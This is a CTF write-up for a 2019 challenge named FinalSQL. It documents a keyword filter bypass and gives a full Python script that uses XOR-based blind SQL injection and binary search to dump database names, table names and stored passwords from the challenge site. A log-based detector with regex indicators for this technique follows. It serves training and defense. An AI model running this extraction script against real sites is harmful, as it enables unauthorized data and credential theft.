[极客大挑战 2019]FinalSQL
By requesting ?id=xxxx you can test which characters and keywords are filtered; the Burp Suite Intruder module can be used to enumerate the filtering in bulk.
Filtered: the equals sign (=), if, union, #, spaces, *, and others.
Not filtered: select, ^, single quotes, regexp, ascii, substr, from, where, and others.
Test payload:
?id=1^(ascii(substr(database(),1,1))>128)
The script:
```python
import requests
import time

url = "http://034e464a-0894-4c26-b4a8-c0932264dc6f.node3.buuoj.cn/search.php"
flag = ""
# Binary search one character position at a time: the XOR makes id=1 when the
# condition is false (normal "NO! Not this!" page) and id=0 when it is true.
for i in range(10, 127):
    print(i, ":")
    low = 32
    high = 128
    mid = (low + high) // 2
    while low <= high:
        print(mid)
        # payload = "?id=1^(ascii(substr(database(),{0},1))>{1})".format(i, mid)  # database name: geek
        # payload = "?id=1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{0},1))>{1})".format(i, mid)  # all databases
        # information_schema,mysql,performance_schema,test,geek
        # payload = "?id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where((table_schema)regexp('geek'))),{0},1))>{1})".format(i, mid)  # table names
        # geek: F1naI1y,Flaaaaag
        # payload = "?id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where((table_name)regexp('F1naI1y'))),{0},1))>{1})".format(i, mid)  # column names
        # Flaaaaag: id,fl4gawsl (hint message)
        # F1naI1y: id,username,password
        payload = "?id=1^(ascii(substr((select(password)from(F1naI1y)where((username)regexp('flag'))),{0},1))>{1})".format(i, mid)
        # username: mygod,welcome,site,site,site,site,Syc,finally,flag
        # flag:
        t = requests.get(url + payload)
        # print(t.text)
        if "NO! Not this! Click others~~~" in t.text:
            # condition false: the character is <= mid
            high = mid - 1
            mid = (low + high) // 2
        else:
            # condition true: the character is > mid
            low = mid + 1
            mid = (low + high) // 2
    # when the loop ends, low == high + 1 is the character's ASCII value
    flag += chr(high + 1)
    print(flag)
    time.sleep(1)
```
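The script above shows why a keyword blacklist (blocking =, spaces, union, #) does not stop extraction: the same work is done with ^, regexp, parentheses and ascii/substr. From the defender's side the fix is parameterized queries on search.php rather than a longer blacklist, and the probing itself is easy to spot in access logs, because a binary search sends many near-identical requests whose only variation is a number. The following detector is an added example written for this page, not code from the original writeup or the challenge; the Apache-style log lines, the IP addresses and the table and column names in them are constructed, and the indicator names are my own.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not taken from the original page).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /search.php?id=1%5E(ascii(substr(database(),1,1))%3E64) HTTP/1.1" 200 498
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /search.php?id=1%5E(ascii(substr((select(password)from(users)where((username)regexp('admin'))),1,1))%3E96) HTTP/1.1" 200 498
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /search.php?id=3 HTTP/1.1" 200 530
"""

# Common log format: client, ident, user, [timestamp], "METHOD target PROTO", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+)'
)

# Each indicator is one trait of the XOR/boolean blind technique described above.
INDICATORS = [
    # a numeric id immediately XORed with a parenthesised condition: 1^(...)
    ("xor_boolean", re.compile(r"^\s*\d+\s*\^\s*\(")),
    # per-character extraction helpers
    ("char_extract", re.compile(r"\b(ascii|ord|substr|substring|mid)\s*\(", re.I)),
    # regexp/like used as a replacement for the filtered equals sign
    ("regexp_like", re.compile(r"\b(regexp|rlike|like)\b", re.I)),
    # keyword directly followed by '(' : parentheses standing in for filtered spaces
    ("no_space_sql", re.compile(r"\b(select|from|where)\(", re.I)),
    # a numeric comparison closing a condition, as produced by the binary search
    ("comparison", re.compile(r"[<>]\s*\d+\s*\)")),
]


def parse_line(line):
    """Return ip, path and decoded query parameters for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl percent-decodes the values, so %5E becomes ^ and %3E becomes >
    params = parse_qsl(parts.query, keep_blank_values=True)
    return {"ip": m.group("ip"), "path": parts.path, "params": params}


def analyze_value(value):
    """Names of the indicators that fire on one decoded parameter value."""
    return [name for name, rx in INDICATORS if rx.search(value)]


def analyze_log(text, min_indicators=2):
    """Requests where at least min_indicators traits fire on a single parameter."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            hits = analyze_value(value)
            if len(hits) >= min_indicators:
                findings.append({"ip": rec["ip"], "path": rec["path"],
                                 "param": name, "indicators": hits})
    return findings


def suspicious_clients(findings, threshold=2):
    """Clients that sent at least `threshold` flagged requests (probe bursts)."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    hits = analyze_log(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["path"], h["param"], ",".join(h["indicators"]))
    print("clients to investigate:", suspicious_clients(hits))
```

Two traits on one parameter are required before a request is flagged, so a search string that merely contains the word "like" is not reported; the per-client count then turns individual hits into the burst signature of a character-by-character extraction, which is the thing worth alerting on.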
A similar challenge using POST injection: https://blog.csdn.net/yao_xin_de_yuan/article/details/108306162